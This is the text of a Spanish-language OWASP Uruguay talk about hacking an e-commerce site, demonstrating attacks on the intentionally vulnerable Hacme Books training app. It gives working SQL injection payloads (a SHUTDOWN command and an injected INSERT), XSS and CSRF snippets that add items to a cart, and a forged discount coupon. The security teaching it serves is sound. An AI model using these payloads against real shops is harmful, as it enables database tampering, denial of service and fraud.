View
73
Download
1
Category
Tags:
Preview:
DESCRIPTION
Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez , QSA, CISSP OWASP URUGUAY. OWASP Vulnerable Web Applications Directory Project. Get out of Jail!. http:// goo.gl /84NfEv. HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 Hacme Books Hacme Casino v1.0 - PowerPoint PPT Presentation
Citation preview
Ejemplos Prácticos de Hacking a un
eCommerce
Mateo Martínez, QSA, CISSPOWASP URUGUAY
OWASP Vulnerable Web Applications Directory
Project
http://goo.gl/84NfEv
Get out of Jail!
HackPack v1.0
Hacme Bank - Android v1.0
Hacme Bank v2.0
Hacme Books
Hacme Casino v1.0
Hacme Shipping
Hacme Travel
#1Generación de
Errores
“ ’ ”
stack trace
“ ’ ”• Tipo de BD – Hypersonic SQL (org.hsqldb)
• Servidor de Aplicación – Apache Tomcat
• Utiliza Spring framework
• Aplicación J2EE application – Java namespaces
#2Inyección SQL (a)
Comando para hacer un halt al servidor de BD en HSQLDB :SHUTDOWN
Comando para hacer un halt al servidor de BD en HSQLDB :SHUTDOWN
select * from products where title like '%texto_del_usuario%' and like '%otro_texto_del_usuario%'
select * from products where title like '%'; SHUTDOWN; --%' and like '%otro_texto_del_usuario%'
#2Inyección SQL (b)
my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley','1234567890123','Disgruntled Employee','http://',1); --
#3XSS
(Cross-Site Scripting)
<script>alert("XSS")</script>
You should buy our latest bestseller instead of this book.
<script>
location="http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470"
</script>
#4CSRF
(Cross-Site Request Forgery)
You should really consider purchasing the latest bestseller.
<img src=http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470 height="1"/>
#5Crypto
15 % de DescuentoAEODBOBOOF
25% de DescuentoBEAAABBOOF BEOABDBOOF
AEODBOBOOF BEAAABBOOF BEOABDBOOF
BEAAAB2006
BEOABD2006
2511122006 2501242006
% Mes Día Año15 04 20 2006 25 11 12 2006 95 04 20
2014 IE OD BO BOAD
Probar este cupón: IEODBOBOAD
#6Broken Access
Control
Hacme Bookshttp://sourceforge.net/projects/foundstone
¡Muchas gracias!
mateo.martinez@owasp.org
Recommended